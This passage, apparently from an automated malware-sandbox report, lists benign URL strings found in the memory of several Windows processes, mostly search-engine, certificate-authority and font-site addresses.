Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 11-27.exe, 00000000.00000002.414643524.00000000008AA000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOECCCertificationAuthority.crl0r
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl0
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://crt.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crt0%
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca4.com0
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000001.00000000.370844122.0000000007890000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000001.00000000.370844122.0000000007890000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000001.00000000.354990906.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
